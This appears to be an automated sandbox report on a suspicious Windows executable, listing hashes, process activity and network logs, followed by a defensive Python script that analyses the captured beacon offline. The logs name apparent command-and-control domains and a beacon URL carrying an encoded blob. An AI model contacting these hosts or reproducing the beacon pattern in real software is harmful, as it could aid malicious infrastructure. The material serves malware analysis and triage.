Analysis

  • max time kernel
    123s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    11/10/2022, 13:01 UTC

General

  • Target

    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe

  • Size

    299KB

  • MD5

    6e6fcd19e67d8595f121ac8e0a5957f1

  • SHA1

    100a09c48f837f18701c56da52ad713f3a323e95

  • SHA256

    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2

  • SHA512

    dca76ba5ae9b1fb755c301cef1890d78000b7e17933ac2fb3db3a6bb8240be9f737cb13472c578ae03a77417c24be8fe6765f6683fce260270e0d3aa539c2b8f

  • SSDEEP

    6144:awZI24IrBnYyhom8wJnroRMAVsHtj5HZ09h:awGqJoWJnreMASH3+9h

Score
4/10

Malware Config

Signatures

  • Drops file in Windows directory 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    "C:\Users\Admin\AppData\Local\Temp\b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe"
    • Drops file in Windows directory
    PID:4640

Network

    Country: US
    DNS
    keyallstate.link
    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    Remote address:
    8.8.8.8:53
    Request
    keyallstate.link
    IN A
    Response
    keyallstate.link
    IN A
    58.158.177.102
    Country: US
    DNS
    resume-install.net
    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    Remote address:
    8.8.8.8:53
    Request
    resume-install.net
    IN A
    Response
    Country: JP
    GET
    http://keyallstate.link/?q=MuwgPur20NxuL0dSUMpfRAn8UokFeqex1lfzINRf7gvPVYA9Y14XGIErYWBHohMB21zG8jtXcIErNoB5emqiCtmNVPGe2g7sMa%2FXtjNdq3lWi0C0T71IvRO72KZUmGJFRIYnh%2BJy8vJswj4QBytKMbuqvVeEDQsmQRjqH%2Fk4YOWSImWjnz5FTqOzJn%2BKftTmzqfH5WIoaIwZYWwmJ9LLozCckbJJ1%2FS5I4JjnEgnNmrOrN4IZFTd9Ptf%2FcIR3A%2FldS%2FIE2moNZ2EB5G%2BSQdb1b4VIrRWcpnkgSr%2BjWv86FqQFpX19goMjfrJLPHzNRKtcq5ULeWqw3ZYH0bqp66p1YZ%2BTSb5x%2Fmr4Zr0Fw6mNxARZkM6Q1Q502A03ck89FsSm4JAHby8
    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    Remote address:
    58.158.177.102:80
    Request
    GET /?q=MuwgPur20NxuL0dSUMpfRAn8UokFeqex1lfzINRf7gvPVYA9Y14XGIErYWBHohMB21zG8jtXcIErNoB5emqiCtmNVPGe2g7sMa%2FXtjNdq3lWi0C0T71IvRO72KZUmGJFRIYnh%2BJy8vJswj4QBytKMbuqvVeEDQsmQRjqH%2Fk4YOWSImWjnz5FTqOzJn%2BKftTmzqfH5WIoaIwZYWwmJ9LLozCckbJJ1%2FS5I4JjnEgnNmrOrN4IZFTd9Ptf%2FcIR3A%2FldS%2FIE2moNZ2EB5G%2BSQdb1b4VIrRWcpnkgSr%2BjWv86FqQFpX19goMjfrJLPHzNRKtcq5ULeWqw3ZYH0bqp66p1YZ%2BTSb5x%2Fmr4Zr0Fw6mNxARZkM6Q1Q502A03ck89FsSm4JAHby8 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
    Host: keyallstate.link
    Response
    HTTP/1.1 200 OK
    Date: Tue, 11 Oct 2022 17:58:52 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
    Last-Modified: Mon, 30 Nov 2015 13:48:40 GMT
    ETag: "9-525c24c725e00"
    Accept-Ranges: bytes
    Content-Length: 9
    Content-Type: text/html; charset=UTF-8
    Country: US
    DNS
    164.2.77.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    164.2.77.40.in-addr.arpa
    IN PTR
    Response
    Country: US
    DNS
    106.89.54.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    106.89.54.20.in-addr.arpa
    IN PTR
    Response
  • 178.79.208.1:80
    156 B
    3
  • 93.184.220.29:80
    322 B
    7
  • 58.158.177.102:80
    http://keyallstate.link/?q=MuwgPur20NxuL0dSUMpfRAn8UokFeqex1lfzINRf7gvPVYA9Y14XGIErYWBHohMB21zG8jtXcIErNoB5emqiCtmNVPGe2g7sMa%2FXtjNdq3lWi0C0T71IvRO72KZUmGJFRIYnh%2BJy8vJswj4QBytKMbuqvVeEDQsmQRjqH%2Fk4YOWSImWjnz5FTqOzJn%2BKftTmzqfH5WIoaIwZYWwmJ9LLozCckbJJ1%2FS5I4JjnEgnNmrOrN4IZFTd9Ptf%2FcIR3A%2FldS%2FIE2moNZ2EB5G%2BSQdb1b4VIrRWcpnkgSr%2BjWv86FqQFpX19goMjfrJLPHzNRKtcq5ULeWqw3ZYH0bqp66p1YZ%2BTSb5x%2Fmr4Zr0Fw6mNxARZkM6Q1Q502A03ck89FsSm4JAHby8
    http
    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    882 B
    452 B
    6
    4

    HTTP Request

    GET http://keyallstate.link/?q=MuwgPur20NxuL0dSUMpfRAn8UokFeqex1lfzINRf7gvPVYA9Y14XGIErYWBHohMB21zG8jtXcIErNoB5emqiCtmNVPGe2g7sMa%2FXtjNdq3lWi0C0T71IvRO72KZUmGJFRIYnh%2BJy8vJswj4QBytKMbuqvVeEDQsmQRjqH%2Fk4YOWSImWjnz5FTqOzJn%2BKftTmzqfH5WIoaIwZYWwmJ9LLozCckbJJ1%2FS5I4JjnEgnNmrOrN4IZFTd9Ptf%2FcIR3A%2FldS%2FIE2moNZ2EB5G%2BSQdb1b4VIrRWcpnkgSr%2BjWv86FqQFpX19goMjfrJLPHzNRKtcq5ULeWqw3ZYH0bqp66p1YZ%2BTSb5x%2Fmr4Zr0Fw6mNxARZkM6Q1Q502A03ck89FsSm4JAHby8

    HTTP Response

    200
  • 104.80.225.205:443
    322 B
    7
  • 20.42.73.26:443
    322 B
    7
  • 8.8.8.8:53
    keyallstate.link
    dns
    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    62 B
    78 B
    1
    1

    DNS Request

    keyallstate.link

    DNS Response

    58.158.177.102

  • 8.8.8.8:53
    resume-install.net
    dns
    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    64 B
    137 B
    1
    1

    DNS Request

    resume-install.net

  • 8.8.8.8:53
    164.2.77.40.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    164.2.77.40.in-addr.arpa

  • 8.8.8.8:53
    106.89.54.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    106.89.54.20.in-addr.arpa
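
The single HTTP exchange recorded above is the most useful artefact in this report: an unauthenticated GET to keyallstate.link (58.158.177.102) carrying a 392-character base64 blob in the q parameter, answered with a 9-byte body whose Last-Modified header is from 2015. The script below is an added triage example, not part of the tria.ge report and not code from the sample; it re-types the captured request and response headers as constructed input so it runs offline, and checks the three things a practitioner would look for in a beacon like this: whether the q value is valid base64 and how random the decoded bytes are, whether the User-Agent is a stale browser string compiled into the binary (Chrome 37 dates from 2014), and whether a tiny body with a years-old Last-Modified means the server returned a static file regardless of the query, which is typical of a dead or placeholder C2. The thresholds (Chrome major version below 80, body of at most 64 bytes, Last-Modified more than a year older than the Date header) are this example's own choices.

```python
# Added triage example for the keyallstate.link beacon in this report (not tria.ge code).
# REQUEST/RESPONSE are re-typed from the report as constructed sample input; the
# thresholds in triage() are this example's own choices, not values from the report.
import base64
import binascii
import math
import re
from collections import Counter
from email.utils import parsedate_to_datetime
from urllib.parse import parse_qs, urlsplit

# The q= value exactly as captured, still URL-encoded, split only for readability.
Q_VALUE = (
    "MuwgPur20NxuL0dSUMpfRAn8UokFeqex1lfzINRf7gvPVYA9Y14XGIErYWBHohMB21zG8jtXcIErNoB5emqiCtmNVPGe2g7sMa%2F"
    "XtjNdq3lWi0C0T71IvRO72KZUmGJFRIYnh%2BJy8vJswj4QBytKMbuqvVeEDQsmQRjqH%2Fk4YOWSImWjnz5F"
    "TqOzJn%2BKftTmzqfH5WIoaIwZYWwmJ9LLozCckbJJ1%2FS5I4JjnEgnNmrOrN4IZFTd9Ptf%2FcIR3A%2FldS%2FIE2moNZ2EB5G%2B"
    "SQdb1b4VIrRWcpnkgSr%2BjWv86FqQFpX19goMjfrJLPHzNRKtcq5ULeWqw3ZYH0bqp66p1YZ%2BTSb5x%2Fmr4Zr0Fw6mNxARZkM6Q1Q502A03ck89FsSm4JAHby8"
)

REQUEST = (
    f"GET /?q={Q_VALUE} HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36\r\n"
    "Host: keyallstate.link\r\n\r\n"
)
RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Tue, 11 Oct 2022 17:58:52 GMT\r\n"
    "Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips\r\n"
    "Last-Modified: Mon, 30 Nov 2015 13:48:40 GMT\r\n"
    'ETag: "9-525c24c725e00"\r\n'
    "Accept-Ranges: bytes\r\n"
    "Content-Length: 9\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n\r\n"
)


def parse_http(raw):
    """Split raw HTTP text into (start line, lower-cased header dict)."""
    start, *lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers


def shannon_entropy(data):
    """Bits per byte; encrypted or compressed data sits close to 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def decode_query_blob(target, name="q"):
    """URL-decode one query parameter and base64-decode it, or return None.
    parse_qs maps %2F/%2B back to '/' and '+'; '=' padding is restored if stripped."""
    values = parse_qs(urlsplit(target).query).get(name)
    if not values:
        return None
    blob = values[0] + "=" * (-len(values[0]) % 4)
    try:
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None


def triage(request, response, stale_chrome_major=80, max_static_body=64):
    """Collect beacon indicators from one request/response pair."""
    start, req_h = parse_http(request)
    method, target, _ = start.split(" ", 2)
    status_line, resp_h = parse_http(response)
    findings = {"method": method, "host": req_h.get("host"),
                "status": status_line.split(" ")[1]}

    # Indicator 1: an opaque base64 blob in the query string (size and randomness).
    payload = decode_query_blob(target)
    if payload is not None:
        findings["query_blob_bytes"] = len(payload)
        findings["query_blob_entropy"] = round(shannon_entropy(payload), 2)

    # Indicator 2: browser-like UA with an ancient Chrome major version = hard-coded string.
    m = re.search(r"Chrome/(\d+)\.", req_h.get("user-agent", ""))
    if m:
        findings["chrome_major"] = int(m.group(1))
        findings["stale_user_agent"] = int(m.group(1)) < stale_chrome_major

    # Indicator 3: tiny body whose Last-Modified predates the request by years =
    # a static file served regardless of the query (dead or placeholder C2).
    body_len = int(resp_h.get("content-length", -1))
    findings["body_bytes"] = body_len
    if "date" in resp_h and "last-modified" in resp_h:
        age = parsedate_to_datetime(resp_h["date"]) - parsedate_to_datetime(resp_h["last-modified"])
        findings["static_response"] = 0 <= body_len <= max_static_body and age.days > 365
    return findings


if __name__ == "__main__":
    for key, value in triage(REQUEST, RESPONSE).items():
        print(f"{key}: {value}")
```

Run it directly to print the indicators. The decoded blob is kept as raw bytes because the report gives no key or scheme to recover its plaintext; the entropy figure only tells you whether it looks encrypted or compressed rather than being plain text. The same triage() function works on any request/response pair pulled from a PCAP, which is the point of keeping the parsing separate from the captured sample.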

MITRE ATT&CK Matrix

Downloads

  • memory/4640-132-0x0000000000140000-0x0000000000171000-memory.dmp

    Filesize

    196KB

  • memory/4640-133-0x00000000008A0000-0x00000000008CF000-memory.dmp

    Filesize

    188KB

  • memory/4640-137-0x0000000000140000-0x0000000000171000-memory.dmp

    Filesize

    196KB

  • memory/4640-138-0x0000000000140000-0x0000000000171000-memory.dmp

    Filesize

    196KB
